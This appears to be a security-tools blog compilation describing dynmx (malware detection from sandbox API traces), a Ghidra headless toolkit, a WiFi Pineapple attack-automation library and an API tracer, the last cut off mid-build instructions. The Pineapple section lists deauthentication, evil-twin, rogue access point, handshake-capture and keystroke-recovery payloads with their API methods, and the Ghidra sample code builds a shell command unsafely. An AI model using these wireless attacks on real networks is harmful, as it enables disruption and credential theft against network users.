    dynmx (spoken dynamics) is a signature-based detection approach for behavioural malware features based on Windows API call sequences. In a simplified way, you can think of dynmx as a sort of YARA for API call traces (so called function logs) originating from malware sandboxes. Hence, the data basis for the detection approach are not the malware samples themselves which are analyzed statically but data that is generated during a dynamic analysis of the malware sample in a malware sandbox. Currently, dynmx supports function logs of the following malware sandboxes:

    • VMRay (function log, text-based and XML format)
    • CAPEv2 (report.json file)
    • Cuckoo (report.json file)

    The detection approach is described in detail in the master thesis Signature-Based Detection of Behavioural Malware Features with Windows API Calls. This project is the prototype implementation of this approach and was developed in the course of the master thesis. The signatures are manually defined by malware analysts in the dynmx signature DSL and can be detected in function logs with the help of this tool. Features and syntax of the dynmx signature DSL can also be found in the master thesis. Furthermore, you can find sample dynmx signatures in the repository dynmx-signatures. In addition to detecting malware features based on API calls, dynmx can extract OS resources that are used by the malware (a so called Access Activity Model). These resources are extracted by examining the API calls and reconstructing operations on OS resources. Currently, OS resources of the categories filesystem, registry and network are considered in the model.


    Example

    In the following section, examples are shown for the detection of malware features and for the extraction of resources.

    Detection

    For this example, we choose the malware sample with the SHA-256 hash sum c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3. According to MalwareBazaar, the sample belongs to the malware family Amadey. There is a public VMRay analysis report of this sample available which also provides the function log traced by VMRay. This function log will be our data basis which we will use for the detection.

    If we would like to know if the malware sample uses an injection technique called Process Hollowing, we can try to detect the following dynmx signature in the function log.

    dynmx_signature:
    meta:
    name: process_hollow
    title: Process Hollowing
    description: Detection of Process hollowing malware feature
    detection:
    proc_hollow:
    # Create legit process in suspended mode
    - api_call: ["CreateProcess[AW]", "CreateProcessInternal[AW]"]
    with:
    - argument: "dwCreationFlags"
    operation: "flag is set"
    value: 0x4
    - return_value: "return"
    operation: "is not"
    value: 0
    store:
    - name: "hProcess"
    as: "proc_handle"
    - name: "hThread"
    as: "thread_handle"
    # Injection of malicious code into memory of previously created process
    - variant:
    - path:
    # Allocate memory with read, write, execute permission
    - api_call: ["VirtualAllocE x", "VirtualAlloc", "(Nt|Zw)AllocateVirtualMemory"]
    with:
    - argument: ["hProcess", "ProcessHandle"]
    operation: "is"
    value: "$(proc_handle)"
    - argument: ["flProtect", "Protect"]
    operation: "is"
    value: 0x40
    - api_call: ["WriteProcessMemory"]
    with:
    - argument: "hProcess"
    operation: "is"
    value: "$(proc_handle)"
    - api_call: ["SetThreadContext", "(Nt|Zw)SetContextThread"]
    with:
    - argument: "hThread"
    operation: "is"
    value: "$(thread_handle)"
    - path:
    # Map memory section with read, write, execute permission
    - api_call: "(Nt|Zw)MapViewOfSection"
    with:
    - argument: "ProcessHandle"
    operation: "is"
    value: "$(proc_handle)"
    - argument: "AccessProtection"
    operation: "is"
    value: 0x40
    # Resume thread to run injected malicious code
    - api_call: ["ResumeThread", "(Nt|Zw)ResumeThread"]
    with:
    - argument: ["hThread", "ThreadHandle"]
    operation: "is"
    value: "$(thread_handle)"
    condition: proc_hollow as sequence

    Based on the signature, we can find some DSL features that make dynmx powerful:

    • Definition of API call sequences with alternative paths
    • Matching of API call function names with regular expressions
    • Matching of argument and return values with several operators
    • Storage of variables, e.g. in order to track handles in the API call sequence
    • Definition of a detection condition with boolean operators (AND, OR, NOT)

    If we run dynmx with the signature shown above against the function of the sample c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3, we get the following output indicating that the signature was detected.

    $ python3 dynmx.py detect -i 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json -s process_hollow.yml


    |
    __| _ _ _ _ _
    / | | | / |/ | / |/ |/ | /\/
    \_/|_/ \_/|/ | |_/ | | |_/ /\_/
    /|
    \|

    Ver. 0.5 (PoC), by 0x534a


    [+] Parsing 1 function log(s)
    [+] Loaded 1 dynmx signature(s)
    [+] Starting detection process with 1 worker(s). This probably takes some time...

    [+] Result
    process_hollow c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3.txt

    We can get into more detail by setting the output format to detail. Now, we can see the exact API call sequence that was detected in the function log. Furthermore, we can see that the signature was detected in the process 51f0.exe.

    $ python3 dynmx.py -f detail detect -i 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json -s process_hollow.yml


    |
    __| _ _ _ _ _
    / | | | / |/ | / |/ |/ | /\/
    \_/|_/ \_/|/ | |_/ | | |_/ /\_/
    /|
    \|

    Ver. 0.5 (PoC), by 0x534a


    [+] Parsing 1 function log(s)
    [+] Loaded 1 dynmx signature(s)
    [+] Starting detection process with 1 worker(s). This probably takes some time...

    [+] Result
    Function log: c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3.txt
    Signature: process_hollow
    Process: 51f0.exe (PID: 3768)
    Number of Findings: 1
    Finding 0
    proc_hollow : API Call CreateProcessA (Function log line 20560, index 938)
    proc_hollow : API Call VirtualAllocEx (Function log line 20566, index 944)
    proc_hollow : API Call WriteProcessMemory (Function log line 20573, index 951)
    proc_hollow : API Call SetThreadContext (Function log line 20574, index 952)
    proc_hollow : API Call ResumeThread (Function log line 20575, index 953)

    Resources

    In order to extract the accessed OS resources from a function log, we can simply run the dynmx command resources against the function log. An example of the detailed output is shown below for the sample with the SHA-256 hash sum 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9. This is a CAPE sandbox report which is part of the Avast-CTU Public CAPEv2 Dataset.

    $ python3 dynmx.py -f detail resources --input 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json


    |
    __| _ _ _ _ _
    / | | | / |/ | / |/ |/ | /\/
    \_/|_/ \_/|/ | |_/ | | |_/ /\_/
    /|
    \|

    Ver. 0.5 (PoC), by 0x534a


    [+] Parsing 1 function log(s)
    [+] Processing function log(s) with the command 'resources'...

    [+] Result
    Function log: 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json (/Users/sijansen/Documents/dev/dynmx_flogs/cape/Public_Avast_CTU_CAPEv2_Dataset_Full/extracted/601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json)
    Process: 601941F00B194587C9E5.exe (PID: 2008)
    Filesystem:
    C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)
    API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)
    C:\Windows\SysWOW64\ntdll.dll (READ)
    USER32.dll (EXECUTE)
    KERNEL32. dll (EXECUTE)
    C:\Windows\Globalization\Sorting\sortdefault.nls (CREATE)
    Registry:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\DevicePath (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableImprovedZoneCheck (READ)
    HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings (READ)
    HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only (READ)
    Process: 601941F00B194587C9E5.exe (PID: 1800)
    Filesystem:
    C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)
    API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)
    C:\Windows\SysWOW64\ntdll.dll (READ)
    USER32.dll (EXECUTE)
    KERNEL32.dll (EXECUTE)
    [...]
    C:\Users\comp\AppData\Local\vscmouse (READ)
    C:\Users\comp\AppData\Local\vscmouse\vscmouse.exe:Zone.Identifier (DELETE)
    Registry:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup (READ)
    [...]
    Process: vscmouse.exe (PID: 900)
    Filesystem:
    C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)
    API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)
    C:\Windows\SysWOW64\ntdll.dll (READ)
    USER32.dll (EXECUTE)
    KERNEL32.dll (EXECUTE)
    C:\Windows\Globalization\Sorting\sortdefault.nls (CREATE)
    Registry:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\C urrentVersion\Setup (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\DevicePath (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings (READ)
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableImprovedZoneCheck (READ)
    HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings (READ)
    HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only (READ)
    Process: vscmouse.exe (PID: 3036)
    Filesystem:
    C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)
    API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)
    C:\Windows\SysWOW64\ntdll.dll (READ)
    USER32.dll (EXECUTE)
    KERNEL32.dll (EXECUTE)
    C:\Windows\Globalization\Sorting\sortdefault.nls (CREATE)
    C:\ (READ)
    C:\Windows\System32\uxtheme.dll (EXECUTE)
    dwmapi.dll (EXECUTE)
    advapi32.dll (EXECUTE)
    shell32.dll (EXECUTE)
    C:\Users\comp\AppData\Local\vscmouse\vscmouse.exe (CREATE,READ)
    C:\Users\comp\AppData\Local\iproppass\iproppass.exe (DELETE)
    crypt32.dll (EXECUTE)
    urlmon.dll (EXECUTE)
    userenv.dll (EXECUTE)
    wininet.dll (EXECUTE)
    wtsapi32.dll (EXECUTE)
    CRYPTSP.dll (EXECUTE)
    CRYPTBASE.dll (EXECUTE)
    ole32.dll (EXECUTE)
    OLEAUT32.dll (EXECUTE)
    C:\Windows\SysWOW64\oleaut32.dll (EXECUTE)
    IPHLPAPI.DLL (EXECUTE)
    DHCPCSVC.DLL (EXECUTE)
    C:\Users\comp\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\ (CREATE)
    C:\Users\comp\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk (CREATE,READ)
    Registry:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT (READ )
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup (READ)
    [...]
    Network:
    24.151.31.150:465 (READ)
    http://24.151.31.150:465 (READ,WRITE)
    107.10.49.252:80 (READ)
    http://107.10.49.252:80 (READ,WRITE)

    Based on the shown output and the accessed resources, we can deduce some malware features:

    • Within the process 601941F00B194587C9E5.exe (PID 1800), the Zone Identifier of the file C:\Users\comp\AppData\Local\vscmouse\vscmouse.exe is deleted
    • Some DLLs are loaded dynamically
    • The process vscmouse.exe (PID: 3036) connects to the network endpoints http://24.151.31.150:465 and http://107.10.49.252:80

    The accessed resources are interesting for identifying host- and network-based detection indicators. In addition, resources can be used in dynmx signatures. A popular example is the detection of persistence mechanisms in the Registry.

    Installation

    In order to use the software Python 3.9 must be available on the target system. In addition, the following Python packages need to be installed:

    • anytree,
    • lxml,
    • pyparsing,
    • PyYAML,
    • six and
    • stringcase

    To install the packages run the pip3 command shown below. It is recommended to use a Python virtual environment instead of installing the packages system-wide.

    pip3 install -r requirements.txt

    Usage

    To use the prototype, simply run the main entry point dynmx.py. The usage information can be viewed with the -h command line parameter as shown below.

    $ python3 dynmx.py -h
    usage: dynmx.py [-h] [--format {overview,detail}] [--show-log] [--log LOG] [--log-level {debug,info,error}] [--worker N] {detect,check,convert,stats,resources} ...

    Detect dynmx signatures in dynamic program execution information (function logs)

    optional arguments:
    -h, --help show this help message and exit
    --format {overview,detail}, -f {overview,detail}
    Output format
    --show-log Show all log output on stdout
    --log LOG, -l LOG log file
    --log-level {debug,info,error}
    Log level (default: info)
    --worker N, -w N Number of workers to spawn (default: number of processors - 2)

    sub-commands:
    task to perform

    {detect,check,convert,stats,resources}
    detect Detects a dynmx signature
    check Checks the syntax of dynmx signature(s)
    convert Converts function logs to the dynmx generic function log format
    stats Statistics of function logs
    resources Resource activity derived from function log

    In general, as shown in the output, several command line parameters regarding the log handling, the output format for results or multiprocessing can be defined. Furthermore, a command needs be chosen to run a specific task. Please note, that the number of workers only affects commands that make use of multiprocessing. Currently, these are the commands detect and convert.

    The commands have specific command line parameters that can be explored by giving the parameter -h to the command, e.g. for the detect command as shown below.

    $ python3 dynmx.py detect -h
    usage: dynmx.py detect [-h] --sig SIG [SIG ...] --input INPUT [INPUT ...] [--recursive] [--json-result JSON_RESULT] [--runtime-result RUNTIME_RESULT] [--detect-all]

    optional arguments:
    -h, --help show this help message and exit
    --recursive, -r Search for input files recursively
    --json-result JSON_RESULT
    JSON formatted result file
    --runtime-result RUNTIME_RESULT
    Runtime statistics file formatted in CSV
    --detect-all Detect signature in all processes and do not stop after the first detection

    required arguments:
    --sig SIG [SIG ...], -s SIG [SIG ...]
    dynmx signature(s) to detect
    --input INPUT [INPUT ...], -i INPUT [INPUT ...]
    Input files

    As a user of dynmx, you can decide how the output is structured. If you choose to show the log on the console by defining the parameter --show-log, the output consists of two sections (see listing below). The log is shown first and afterwards the results of the used command. By default, the log is neither shown in the console nor written to a log file (which can be defined using the --log parameter). Due to multiprocessing, the entries in the log file are not necessarily in chronological order.



    |
    __| _ _ _ _ _
    / | | | / |/ | / |/ |/ | /\/
    \_/|_/ \_/|/ | |_/ | | |_/ /\_/
    /|
    \|

    Ver. 0.5 (PoC), by 0x534a


    [+] Log output
    2023-06-27 19:07:38,068+0000 [INFO] (__main__) [PID: 13315] []: Start of dynmx run
    [...]
    [+] End of log output

    [+] Result
    [...]

    The level of detail of the result output can be defined using the command line parameter --output-format which can be set to overview for a high-level result or to detail for a detailed result. For example, if you define the output format to detail, detection results shown in the console will contain the exact API calls and resources that caused the detection. The overview output format will just indicate what signature was detected in which function log.

    Example Command Lines

    Detection of a dynmx signature in a function log with one worker process

    python3 dynmx.py -w 1 detect -i "flog.txt" -s dynmx_signature.yml

    Conversion of a function log to the dynmx generic function log format

    python3 dynmx.py convert -i "flog.txt" -o /tmp/

    Check a signature (only basic sanity checks)

    python3 dynmx.py check -s dynmx_signature.yml

    Get a detailed list of used resources used by a malware sample based on the function log (access activity model)

    python3 dynmx.py -f detail resources -i "flog.txt"

    Troubleshooting

    Please consider that this tool is a proof-of-concept which was developed besides writing the master thesis. Hence, the code quality is not always the best and there may be bugs and errors. I tried to make the tool as robust as possible in the given time frame.

    The best way to troubleshoot errors is to enable logging (on the console and/or to a log file) and set the log level to debug. Exception handlers should write detailed errors to the log which can help troubleshooting.



    Sekiryu - Comprehensive Toolkit For Ghidra Headless

    By: Zion3R


    This Ghidra Toolkit is a comprehensive suite of tools designed to streamline and automate various tasks associated with running Ghidra in Headless mode. This toolkit provides a wide range of scripts that can be executed both inside and alongside Ghidra, enabling users to perform tasks such as Vulnerability Hunting, Pseudo-code Commenting with ChatGPT and Reporting with Data Visualization on the analyzed codebase. It allows user to load and save their own script and interract with the built-in API of the script.


    Key Features

    • Headless Mode Automation: The toolkit enables users to seamlessly launch and run Ghidra in Headless mode, allowing for automated and batch processing of code analysis tasks.

    • Script Repository/Management: The toolkit includes a repository of pre-built scripts that can be executed within Ghidra. These scripts cover a variety of functionalities, empowering users to perform diverse analysis and manipulation tasks. It allows users to load and save their own scripts, providing flexibility and customization options for their specific analysis requirements. Users can easily manage and organize their script collection.

    • Flexible Input Options: Users can utilize the toolkit to analyze individual files or entire folders containing multiple files. This flexibility enables efficient analysis of both small-scale and large-scale codebases.

    Available scripts

    • Vulnerability Hunting with pattern recognition: Leverage the toolkit's scripts to identify potential vulnerabilities within the codebase being analyzed. This helps security researchers and developers uncover security weaknesses and proactively address them.
    • Vulnerability Hunting with SemGrep: Thanks to the security Researcher 0xdea and the rule-set they created, we can use simple rules and SemGrep to detect vulnerabilities in C/C++ pseudo code (their github: https://github.com/0xdea/semgrep-rules)
    • Automatic Pseudo Code Generating: Automatically generate pseudo code within Ghidra's Headless mode. This feature assists in understanding and documenting the code logic without manual intervention.
    • Pseudo-code Commenting with ChatGPT: Enhance the readability and understanding of the codebase by utilizing ChatGPT to generate human-like comments for pseudo-code snippets. This feature assists in documenting and explaining the code logic.
    • Reporting and Data Visualization: Generate comprehensive reports with visualizations to summarize and present the analysis results effectively. The toolkit provides data visualization capabilities to aid in identifying patterns, dependencies, and anomalies in the codebase.

    Pre-requisites

    Before using this project, make sure you have the following software installed:

    Installation

    • Install the pre-requisites mentionned above.
    • Download Sekiryu release directly from Github or use: pip install sekiryu.

    Usage

    In order to use the script you can simply run it against a binary with the options that you want to execute.

    • sekiryu [-F FILE][OPTIONS]

    Please note that performing a binary analysis with Ghidra (or any other product) is a relatively slow process. Thus, expect the binary analysis to take several minutes depending on the host performance. If you run Sekiryu against a very large application or a large amount of binary files, be prepared to WAIT

    Demos

    API

    In order to use it the User must import xmlrpc in their script and call the function like for example: proxy.send_data

    Functions

    • send_data() - Allows user to send data to the server. ("data" is a Dictionnary)
    • recv_data() - Allows user to receive data from the server. ("data" is a Dictionnary)
    • request_GPT() - Allows user to send string data via ChatGPT API.

    Use your own scripts

    Scripts are saved in the folder /modules/scripts/ you can simply copy your script there. In the ghidra_pilot.py file you can find the following function which is responsible to run a headless ghidra script:

    def exec_headless(file, script):
    """
    Execute the headless analysis of ghidra
    """
    path = ghidra_path + 'analyzeHeadless'
    # Setting variables
    tmp_folder = "/tmp/out"
    os.mkdir(tmp_folder)
    cmd = ' ' + tmp_folder + ' TMP_DIR -import'+ ' '+ file + ' '+ "-postscript "+ script +" -deleteProject"

    # Running ghidra with specified file and script
    try:
    p = subprocess.run([str(path + cmd)], shell=True, capture_output=True)
    os.rmdir(tmp_folder)

    except KeyError as e:
    print(e)
    os.rmdir(tmp_folder)

    The usage is pretty straight forward, you can create your own script then just add a function in the ghidra_pilot.py such as:

    def yourfunction(file):
    try:
    # Setting script
    script = "modules/scripts/your_script.py"

    # Start the exec_headless function in a new thread
    thread = threading.Thread(target=exec_headless, args=(file, script))
    thread.start()
    thread.join()
    except Exception as e:
    print(str(e))

    The file cli.py is responsible for the command-line-interface and allows you to add argument and command associated like this:

    analysis_parser.add_argument('[-ShortCMD]', '[--LongCMD]', help="Your Help Message", action="store_true")

    Contributions

    • Scripts/SCRIPTS/SCRIIIIIPTS: This tool is designed to be a toolkit allowing user to save and run their own script easily, obviously if you can contribue in any sort of script (anything that is interesting will be approved !)
    • Optimization: Any kind of optimization are welcomed and will almost automically be approved and deployed every release, some nice things could be: improve parallel tasking, code cleaning and overall improvement.
    • Malware analysis: It's a big part, which i'm not familiar with. Any malware analyst willing to contribute can suggest idea, script, or even commit code directly in the project.
    • Reporting: I ain't no data visualization engineer, if anyone is willing to improve/contribue on this part, it'll be very nice.

    Warning

    The xmlrpc.server module is not secure against maliciously constructed data. If you need to parse 
    untrusted or unauthenticated data see XML vulnerabilities.

    Special thanks

    A lot of people encouraged me to push further on this tool and improve it. Without you all this project wouldn't have been
    the same so it's time for a proper shout-out:
    - @JeanBedoul @McProustinet @MilCashh @Aspeak @mrjay @Esbee|sandboxescaper @Rosen @Cyb3rops @RussianPanda @Dr4k0nia
    - @Inversecos @Vs1m @djinn @corelanc0d3r @ramishaath @chompie1337
    Thanks for your feedback, support, encouragement, test, ideas, time and care.

    For more information about Bushido Security, please visit our website: https://www.bushido-sec.com/.



    WiFi-Pineapple-MK7_REST-Client - WiFi Hacking Workflow With WiFi Pineapple Mark VII API

    By: Zion3R


    PINEAPPLE MARK VII REST CLIENT

    Author:: TW-D

    Version:: 1.3.7

    Copyright:: Copyright (c) 2022 TW-D

    License:: Distributes under the same terms as Ruby

    Doc:: https://hak5.github.io/mk7-docs/docs/rest/rest/

    Requires:: Ruby >= 2.7.0p0 and Pineapple Mark VII >= 2.1.0-stable

    Installation (Debian, Ubuntu, Raspbian)::

    • sudo apt-get install build-essential curl g++ ruby ruby-dev

    • sudo gem install net-ssh rest-client tty-progressbar

    Description

    Library allowing the automation of active or passive attack operations.

    Note : "Issues" and "Pull Request" are welcome.


    Payloads

    In "./payloads/" directory, you will find :

    COMMAND and CONTROL Author Usage
    Hak5 Key Croc - Real-time recovery of keystrokes from a keyboard TW-D (edit) ruby ./hak5_key-croc.rb
    Maltronics WiFi Deauther - Spam beacon frames TW-D (edit) ruby ./maltronics_wifi-deauther.rb
    DEFENSE Author Usage
    Hak5 Pineapple Spotter TW-D with special thanks to @DrSKiZZ, @cribb-it, @barry99705 and @dark_pyrro (edit) ruby ./hak5-pineapple_spotter.rb
    DoS Author Usage
    Deauthentication of clients available on the access points TW-D (edit) ruby ./deauthentication-clients.rb
    EXPLOITATION Author Usage
    Evil WPA Access Point TW-D (edit) ruby ./evil-wpa_access-point.rb
    Fake Access Points TW-D (edit) ruby ./fake_access-points.rb
    Mass Handshakes TW-D (edit) ruby ./mass-handshakes.rb
    Rogue Access Points TW-D (edit) ruby ./rogue_access-points.rb
    Twin Access Points TW-D (edit) ruby ./twin_access-points.rb
    GENERAL Author Usage
    System Status, Disk Usage, ... TW-D (edit) ruby ./dashboard-stats.rb
    Networking Interfaces TW-D (edit) ruby ./networking-interfaces.rb
    System Logs TW-D (edit) ruby ./system-logs.rb
    RECON Author Usage
    Access Points and Clients on 2.4GHz and 5GHz (with a supported adapter) TW-D (edit) ruby ./access-points_clients_5ghz.rb
    Access Points and Clients TW-D (edit) ruby ./access-points_clients.rb
    MAC Addresses of Access Points TW-D (edit) ruby ./access-points_mac-addresses.rb
    Tagged Parameters of Access Points TW-D (edit) ruby ./access-points_tagged-parameters.rb
    Access Points and Wireless Network Mapping with WiGLE TW-D (edit) ruby ./access-points_wigle.rb
    MAC Addresses of Clients TW-D (edit) ruby ./clients_mac-addresses.rb
    OPEN Access Points TW-D (edit) ruby ./open_access-points.rb
    WEP Access Points TW-D (edit) ruby ./wep_access-points.rb
    WPA Access Points TW-D (edit) ruby ./wpa_access-points.rb
    WPA2 Access Points TW-D (edit) ruby ./wpa2_access-points.rb
    WPA3 Access Points TW-D (edit) ruby ./wpa3_access-points.rb
    WARDRIVING Author Usage
    Continuous Recon on 2.4GHz and 5GHz (with a supported adapter) TW-D (edit) ruby ./continuous-recon_5ghz.rb [CTRL+c]
    Continuous Recon for Handshakes Capture TW-D (edit) ruby ./continuous-recon_handshakes.rb [CTRL+c]
    Continuous Recon TW-D (edit) ruby ./continuous-recon.rb [CTRL+c]

    Payload skeleton for development

    #
    # Title: <TITLE>
    #
    # Description: <DESCRIPTION>
    #
    #
    # Author: <AUTHOR>
    # Version: <VERSION>
    # Category: <CATEGORY>
    #
    # STATUS
    # ======================
    # <SHORT-DESCRIPTION> ... SETUP
    # <SHORT-DESCRIPTION> ... ATTACK
    # <SHORT-DESCRIPTION> ... SPECIAL
    # <SHORT-DESCRIPTION> ... FINISH
    # <SHORT-DESCRIPTION> ... CLEANUP
    # <SHORT-DESCRIPTION> ... OFF
    #

    require_relative('<PATH-TO>/classes/PineappleMK7.rb')

    system_authentication = PineappleMK7::System::Authentication.new
    system_authentication.host = "<PINEAPPLE-IP-ADDRESS>"
    system_authentication.port = 1471
    system_authentication.mac = "<PINEAPPLE-MAC-ADDRESS>"
    system_authentication.password = "<ROOT-ACCOUNT-PASSWORD>"

    if (system_authentication.login)

    led = PineappleMK7::System::LED.new

    # SETUP
    #
    led.setup

    #
    # [...]
    #

    # ATTACK
    #
    led.attack

    #
    # [...]
    #

    # SPECIAL
    #
    led.special

    #
    # [...]
    #

    # FINISH
    #
    led.finish

    #
    # [...]
    #

    # CLEANUP
    #
    led.cleanup

    #
    # [...]
    #

    # OFF
    #
    led.off

    end

    Note : Don't hesitate to take inspiration from the payloads directory.

    System modules

    Authentication accessors/method

    system_authentication = PineappleMK7::System::Authentication.new

    system_authentication.host = (string) "<PINEAPPLE-IP-ADDRESS>"
    system_authentication.port = (integer) 1471
    system_authentication.mac = (string) "<PINEAPPLE-MAC-ADDRESS>"
    system_authentication.password = (string) "<ROOT-ACCOUNT-PASSWORD>"

    system_authentication.login()

    LED methods

    led = PineappleMK7::System::LED.new

    led.setup()
    led.failed()
    led.attack()
    led.special()
    led.cleanup()
    led.finish()
    led.off()

    Pineapple Modules

    Dashboard

    Notifications method

    dashboard_notifications = PineappleMK7::Modules::Dashboard::Notifications.new

    dashboard_notifications.clear()

    Stats method

    dashboard_stats = PineappleMK7::Modules::Dashboard::Stats.new

    dashboard_stats.output()

    Logging

    System method

    logging_system = PineappleMK7::Modules::Logging::System.new

    logging_system.output()

    PineAP

    Clients methods

    pineap_clients = PineappleMK7::Modules::PineAP::Clients.new

    pineap_clients.connected_clients()
    pineap_clients.previous_clients()
    pineap_clients.kick( (string) mac )
    pineap_clients.clear_previous()

    EvilWPA accessors/method

    evil_wpa = PineappleMK7::Modules::PineAP::EvilWPA.new

    evil_wpa.ssid = (string default:'PineAP_WPA')
    evil_wpa.bssid = (string default:'00:13:37:BE:EF:00')
    evil_wpa.auth = (string default:'psk2+ccmp')
    evil_wpa.password = (string default:'pineapplesareyummy')
    evil_wpa.hidden = (boolean default:false)
    evil_wpa.enabled = (boolean default:false)
    evil_wpa.capture_handshakes = (boolean default:false)

    evil_wpa.save()

    Filtering methods

    pineap_filtering = PineappleMK7::Modules::PineAP::Filtering.new

    pineap_filtering.client_filter( (string) 'allow' | 'deny' )
    pineap_filtering.add_client( (string) mac )
    pineap_filtering.clear_clients()
    pineap_filtering.ssid_filter( (string) 'allow' | 'deny' )

    Impersonation methods

    pineap_impersonation = PineappleMK7::Modules::PineAP::Impersonation.new

    pineap_impersonation.output()
    pineap_impersonation.add_ssid( (string) ssid )
    pineap_impersonation.clear_pool()

    OpenAP method

    open_ap = PineappleMK7::Modules::PineAP::OpenAP.new

    open_ap.output()

    Settings accessors/method

    pineap_settings = PineappleMK7::Modules::PineAP::Settings.new

    pineap_settings.enablePineAP = (boolean default:true)
    pineap_settings.autostartPineAP = (boolean default:true)
    pineap_settings.armedPineAP = (boolean default:false)
    pineap_settings.ap_channel = (string default:'11')
    pineap_settings.karma = (boolean default:false)
    pineap_settings.logging = (boolean default:false)
    pineap_settings.connect_notifications = (boolean default:false)
    pineap_settings.disconnect_notifications = (boolean default:false)
    pineap_settings.capture_ssids = (boolean default:false)
    pineap_settings.beacon_responses = (boolean default:false)
    pineap_settings.broadcast_ssid_pool = (boolean default:false)
    pineap_settings.broadcast_ssid_pool_random = (boolean default:false)
    pineap_settings.pineap_mac = (string default:system_authentication.mac)
    pineap_settings.target_mac = (string default:'FF:FF:FF:FF:FF:FF')< br/>pineap_settings.beacon_response_interval = (string default:'NORMAL')
    pineap_settings.beacon_interval = (string default:'NORMAL')

    pineap_settings.save()

    Recon

    Handshakes methods

    recon_handshakes = PineappleMK7::Modules::Recon::Handshakes.new

    recon_handshakes.start( (object) ap )
    recon_handshakes.stop()
    recon_handshakes.output()
    recon_handshakes.download( (object) handshake, (string) destination )
    recon_handshakes.clear()

    Scanning methods

    recon_scanning = PineappleMK7::Modules::Recon::Scanning.new

    recon_scanning.start( (integer) scan_time )
    recon_scanning.start_continuous( (boolean) autoHandshake )
    recon_scanning.stop_continuous()
    recon_scanning.output( (integer) scanID )
    recon_scanning.tags( (object) ap )
    recon_scanning.deauth_ap( (object) ap )
    recon_scanning.delete( (integer) scanID )

    Settings

    Networking methods

    settings_networking = PineappleMK7::Modules::Settings::Networking.new

    settings_networking.interfaces()
    settings_networking.client_scan( (string) interface )
    settings_networking.client_connect( (object) network, (string) interface )
    settings_networking.client_disconnect( (string) interface )
    settings_networking.recon_interface( (string) interface )


    Tiny_Tracer - A Pin Tool For Tracing API Calls Etc

    By: Zion3R


    A Pin Tool for tracing:


    Bypasses the anti-tracing check based on RDTSC.

    Generates a report in a .tag format (which can be loaded into other analysis tools):

    RVA;traced event

    i.e.

    345c2;section: .text
    58069;called: C:\Windows\SysWOW64\kernel32.dll.IsProcessorFeaturePresent
    3976d;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
    3983c;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress
    3999d;called: C:\Windows\SysWOW64\KernelBase.dll.InitializeCriticalSectionEx
    398ac;called: C:\Windows\SysWOW64\KernelBase.dll.FlsAlloc
    3995d;called: C:\Windows\SysWOW64\KernelBase.dll.FlsSetValue
    49275;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
    4934b;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress
    ...

    How to build

    On Windows

    To compile the prepared project you need to use Visual Studio >= 2012. It was tested with Intel Pin 3.28.
    Clone this repo into \source\tools that is inside your Pin root directory. Open the project in Visual Studio and build. Detailed description available here.
    To build with Intel Pin < 3.26 on Windows, use the appropriate legacy Visual Studio project.

    On Linux

